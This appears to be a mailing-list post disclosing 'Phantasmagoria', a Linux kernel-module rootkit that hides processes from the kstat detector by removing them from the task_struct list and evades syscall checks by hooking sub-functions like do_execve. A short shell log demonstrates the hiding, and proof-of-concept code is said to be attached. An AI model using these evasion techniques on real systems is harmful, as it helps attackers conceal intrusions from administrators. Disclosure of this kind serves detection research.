Is possible to hide processes to kstat removing theirs structs from the kernel's task_struct list. Is also possible to bypass kstat's checks on syscalls: if you modify a sub-function instead of the call (for example do_execve instad of sys_execve) the effects is the same, but for kstat is all okay: Shoikan:~/Phantasmagoria# ./kstat -P | grep kstat 686 403 0 0 kstat Shoikan:~/Phantasmagoria# ./kstat -S Probing System Calls FingerPrints... No System Call Modified! Shoikan:~/Phantasmagoria# insmod Phantasmagoria.o Shoikan:~/Phantasmagoria# ./Heider 403(the current shell pid) HIDE Hiding successfull Shoikan:~/Phantasmagoria# ./kstat -P | grep kstat Shoikan:~/Phantasmagoria# ./kstat -S Probing System Calls FingerPrints... No System Call Modified! Shoikan:~/Phantasmagoria# Attached there is an english translation + proof of concept code of the original paper published on www.s0ftpj.org Regards -= Dark-Angel =- Is your boss reading your email? ....Probably Keep your messages private by using Lycos Mail. Sign up today at http://mail.lycos.com
Attachment:
Phantasmagoria.tgz
Description: GNU Zip compressed data
